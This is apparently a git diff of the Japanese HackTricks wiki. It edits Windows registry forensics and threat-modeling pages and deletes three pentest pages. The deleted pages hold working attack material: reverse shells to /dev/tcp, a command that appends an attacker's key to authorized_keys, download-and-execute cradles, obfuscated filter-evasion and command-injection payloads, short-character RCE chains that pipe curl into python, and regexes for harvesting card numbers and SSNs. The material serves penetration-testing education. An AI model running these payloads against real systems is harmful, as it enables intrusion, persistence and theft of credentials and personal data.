- User Assist機能は、実行回数や最終実行時間を含む詳細なアプリケーション使用統計を **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`** に記録します。
### **シェルバッグの分析**
- フォルダアクセスの詳細を明らかにするシェルバッグは、`USRCLASS.DAT`および`NTUSER.DAT`の下の`Software\Microsoft\Windows\Shell`に保存されています。分析には**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**を使用してください。
- フォルダアクセスの詳細を明らかにするシェルバッグは、`USRCLASS.DAT` および `NTUSER.DAT` の下の `Software\Microsoft\Windows\Shell` に保存されています。分析には **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** を使用してください。
### **USBデバイスの履歴**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**および**`HKLM\SYSTEM\ControlSet001\Enum\USB`**には、接続されたUSBデバイスに関する豊富な詳細が含まれており、製造元、製品名、接続タイムスタンプが含まれます。
- 特定のUSBデバイスに関連付けられたユーザーは、デバイスの**{GUID}**を検索することで特定できます。
- 最後にマウントされたデバイスとそのボリュームシリアル番号は、それぞれ`System\MountedDevices`および`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`を通じて追跡できます。
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** および **`HKLM\SYSTEM\ControlSet001\Enum\USB`** には、接続されたUSBデバイスに関する豊富な詳細が含まれており、製造元、製品名、接続タイムスタンプが記録されています。
- 特定のUSBデバイスに関連付けられたユーザーは、デバイスの **{GUID}** を探すことで `NTUSER.DAT` ハイブから特定できます。
- 最後にマウントされたデバイスとそのボリュームシリアル番号は、それぞれ `System\MountedDevices` および `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` を通じて追跡できます。
このガイドは、Windowsシステム上の詳細なシステム、ネットワーク、およびユーザー活動情報にアクセスするための重要なパスと方法を要約し、明確さと使いやすさを目指しています。

20
src/generic-methodologies-and-resources/threat-modeling.md
View File

@ -1,26 +1,28 @@
# 脅威モデリング
{{#include /banners/hacktricks-training.md}}
## 脅威モデリング
HackTricksの脅威モデリングに関する包括的なガイドへようこそサイバーセキュリティのこの重要な側面を探求し、システム内の潜在的な脆弱性を特定、理解、戦略を立てます。このスレッドは、実世界の例、役立つソフトウェア、わかりやすい説明が詰まったステップバイステップのガイドとして機能します。初心者と経験豊富な実践者の両方にとって、サイバーセキュリティ防御を強化するのに理想的です。
### 一般的に使用されるシナリオ
1. **ソフトウェア開発**: セキュアソフトウェア開発ライフサイクルSSDLCの一環として、脅威モデリングは**開発の初期段階で潜在的な脆弱性の源を特定する**のに役立ちます。
1. **ソフトウェア開発**: セキュアソフトウェア開発ライフサイクルSSDLCの一環として、脅威モデリングは開発の初期段階で**潜在的な脆弱性の源を特定する**のに役立ちます。
2. **ペネトレーションテスト**: ペネトレーションテスト実行標準PTESフレームワークは、テストを実施する前に**システムの脆弱性を理解するための脅威モデリング**を要求します。
### 脅威モデルの概要
脅威モデルは通常、アプリケーションの計画されたアーキテクチャまたは既存のビルドを示す図、画像、または他の形式の視覚的なイラストとして表現されます。これは**データフローダイアグラム**に似ていますが、重要な違いはそのセキュリティ指向の設計にあります。
脅威モデルは通常、アプリケーションの計画されたアーキテクチャまたは既存のビルドを示す図、画像、または他の視覚的なイラストとして表現されます。これは**データフローダイアグラム**に似ていますが、重要な違いはそのセキュリティ指向の設計にあります。
脅威モデルには、潜在的な脆弱性、リスク、または障壁を象徴する赤でマークされた要素がしばしば含まれています。リスク特定のプロセスを簡素化するために、CIA機密性、完全性、可用性トライアドが使用され、多くの脅威モデリング手法の基礎を形成しています。STRIDEは最も一般的なものの一つです。ただし、選択された手法は特定の文脈や要件に応じて異なる場合があります。
脅威モデルには、潜在的な脆弱性、リスク、または障壁を象徴する赤でマークされた要素がしばしば含まれています。リスク特定のプロセスを効率化するために、CIA機密性、完全性、可用性トライアドが使用され、多くの脅威モデリング手法の基礎を形成しています。STRIDEは最も一般的なものの一つです。ただし、選択された手法は特定の文脈や要件によって異なる場合があります。
### CIAトライアド
CIAトライアドは情報セキュリティの分野で広く認識されているモデルで、機密性、完全性、可用性を表します。この3つの柱は、多くのセキュリティ対策やポリシーが構築される基盤を形成し、脅威モデリング手法も含まれます。
CIAトライアドは情報セキュリティの分野で広く認識されているモデルで、機密性、完全性、可用性を表します。この3つの柱は、多くのセキュリティ対策やポリシー基盤を形成し、脅威モデリング手法も含まれます。
1. **機密性**: データやシステムが不正な個人によってアクセスされないことを保証します。これはセキュリティの中心的な側面であり、データ侵害を防ぐために適切なアクセス制御、暗号化、その他の対策が必要です。
2. **完全性**: データの正確性、一貫性、信頼性をそのライフサイクル全体にわたって保証します。この原則は、データが不正な当事者によって変更または改ざんされないことを保します。通常、チェックサム、ハッシュ、その他のデータ検証方法が含まれます。
2. **完全性**: データのライフサイクルにわたる正確性、一貫性、信頼性。これは、データが不正な当事者によって変更または改ざんされないことを保します。通常、チェックサム、ハッシュ、その他のデータ検証方法が含まれます。
3. **可用性**: データとサービスが必要なときに正当なユーザーにアクセス可能であることを保証します。これは、冗長性、フォールトトレランス、高可用性構成を含むことが多く、システムが中断に直面しても稼働し続けることを可能にします。
### 脅威モデリング手法
@ -38,11 +40,11 @@ CIAトライアドは、情報セキュリティの分野で広く認識され
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよび多機能GUIウェブスパイダー/クローラーです。Spider Suiteは攻撃面のマッピングと分析に使用できます。
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよび多機能GUIウェブスパイダー/クローラー。Spider Suiteは攻撃面のマッピングと分析に使用できます。
**使用法**
1. URLを選択しクロール
1. URLを選択しクロール
<figure><img src="../images/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
@ -108,4 +110,6 @@ SpiderSuite Crawlerのようなツールを使ってインスピレーション
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
これは、ソフトウェアプロジェクトの設計段階で脅威を見つけるのに役立つMicrosoftの無料ツールです。STRIDE手法を使用しており、特にMicrosoftのスタックで開発している人に適しています。
これはMicrosoftからの無料ツールで、ソフトウェアプロジェクトの設計段階で脅威を見つけるのに役立ちます。STRIDE手法を使用しており、特にMicrosoftのスタックで開発している人に適しています。
{{#include /banners/hacktricks-training.md}}

BIN
src/images/cyberhelmets-logo.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 16 KiB

After

Width:  |  Height:  |  Size: 16 KiB

35
src/interesting-http.md
View File

@ -1,35 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# リファラーヘッダーとポリシー
リファラーは、ブラウザが前に訪れたページを示すために使用するヘッダーです。
## 機密情報の漏洩
ウェブページ内のどこかに機密情報がGETリクエストパラメータに存在する場合、そのページが外部ソースへのリンクを含んでいるか、攻撃者がユーザーに攻撃者が制御するURLを訪問させることができるソーシャルエンジニアリング場合、最新のGETリクエスト内の機密情報を抽出することが可能です。
## 緩和策
ブラウザに**Referrer-policy**を遵守させることで、機密情報が他のウェブアプリケーションに送信されるのを**回避**することができます:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
## Counter-Mitigation
このルールはHTMLメタタグを使用して上書きできます攻撃者はHTMLインジェクションを利用する必要があります
```html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## 防御
GETパラメータやURLのパスに機密データを入れないでください。
{{#include ./banners/hacktricks-training.md}}

297
src/linux-hardening/useful-linux-commands/README.md
View File

@ -1,297 +0,0 @@
# 有用なLinuxコマンド
{{#include ../../banners/hacktricks-training.md}}
## 一般的なBash
```bash
#Exfiltration using Base64
base64 -w 0 file
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
#Echo without new line and Hex
echo -n -e
#Count
wc -l <file> #Lines
wc -c #Chars
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file
#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80
#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker
#Clipboard
xclip -sel c < cat file.txt
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"
#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
sudo dpkg-reconfigure tzdata
#Search from which package is a binary
apt-file search /usr/bin/file #Needed: apt-get install apt-file
#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw
#Set not removable bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it
# List files inside zip
7z l file.zip
```
## Windows用Bash
```bash
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compression
upx -9 nc.exe
#Exe2bat
wine exe2bat.exe nc.exe nc.txt
#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
#Compile for windows
#sudo apt-get install gcc-mingw-w64-i686
i686-mingw32msvc-gcc -o executable useradd.c
```
## グレップ
```bash
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwords
grep -i "pwd\|passw" file.txt
#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt
# Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
#Extract valid MySQL-Old hashes
grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
#Extract blowfish hashes
grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
#Extract Joomla hashes
egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
#Extract VBulletin hashes
egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
#Extraxt phpBB3-MD5
egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
#Extract Wordpress-MD5
egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
#Extract Drupal 7
egrep -o '$S$S{52}' *.txt > drupal-7.txt
#Extract old Unix-md5
egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
#Extract md5-apr1
egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
#Extract sha512crypt, SHA512(Unix)
egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
#Extract e-mails from text files
grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt
#Extract HTTP URLs from text files
grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL format use
grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club
grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numberss
grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
```
## 見つける
```bash
# Find SUID set files.
find / -perm /u=s -ls 2>/dev/null
# Find SGID set files.
find / -perm /g=s -ls 2>/dev/null
# Found Readable directory and sort by time. (depth = 4)
find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)
find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)
find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)
find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)
find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)
find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)
find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
```
## Nmap 検索ヘルプ
```bash
#Nmap scripts ((default or version) and smb))
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb)"
```
## バッシュ
```bash
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```
## Iptables
```bash
#Delete curent rules and chains
iptables --flush
iptables --delete-chain
#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP
#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
#default policies
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
```
{{#include ../../banners/hacktricks-training.md}}

319
src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
View File

@ -1,319 +0,0 @@
# Linuxの制限を回避する
{{#include ../../banners/hacktricks-training.md}}
## 一般的な制限の回避
### リバースシェル
```bash
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```
### ショート Rev シェル
```bash
#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0
```
### パスと禁止語のバイパス
```bash
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h
# $@
who$@ami #whoami
# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
# Execution through $0
echo whoami|$0
# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
```
### 禁止されたスペースをバイパスする
```bash
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
# Other way, just change each space for ${IFS}
echo${IFS}test
# Using hex format
X=$'cat\x20/etc/passwd'&&$X
# Using tabs
echo "ls\x09-l" | bash
# New lines
p\
i\
n\
g # These 4 lines will equal to ping
# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
```
### バックスラッシュとスラッシュのバイパス
```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
### パイプをバイパスする
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```
### ヘックスエンコーディングを使用したバイパス
```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```
### IPをバイパスする
```bash
# Decimal IPs
127.0.0.1 == 2130706433
```
### 時間ベースのデータ流出
```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```
### 環境変数から文字を取得する
```bash
echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/
```
### DNSデータの抽出
例えば、**burpcollab**や[**pingb**](http://pingb.in)を使用できます。
### ビルトイン
外部関数を実行できず、**RCEを取得するための限られたビルトインのセットにのみアクセスできる**場合、これを行うための便利なトリックがあります。通常、**すべての**ビルトインを使用することは**できない**ので、監獄を回避するために**すべての選択肢を知っておくべき**です。アイデアは[**devploit**](https://twitter.com/devploit)から。\
まず、すべての[**シェルビルトイン**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html)**を確認してください。** それから、いくつかの**推奨事項**があります:
```bash
# Get list of builtins
declare builtins
# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash
# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa
# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords
# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}
# Read file with read
while read -r line; do echo $line; done < /etc/passwd
# Get env variables
declare
# Get history
history
declare history
declare historywords
# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!
```
### ポリグロットコマンドインジェクション
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
### 潜在的な正規表現をバイパスする
```bash
# A regex that only allow letters and numbers might be vulnerable to new line characters
1%0a`curl http://attacker.com`
```
### Bashfuscator
```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```
### 5文字でのRCE
```bash
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
## Finally execute the file "g"
http://host/?cmd=sh g
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*
# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link
## to it in the current folder
```
### 4文字でのRCE
```bash
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'
# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'
# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'
# got shell
'sh x'
'sh g'
```
## 読み取り専用/Noexec/Distroless バイパス
**読み取り専用および noexec 保護** のあるファイルシステム内、または distroless コンテナ内にいる場合でも、**任意のバイナリを実行する方法、さらにはシェルを実行する方法があります!:**
{{#ref}}
../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/
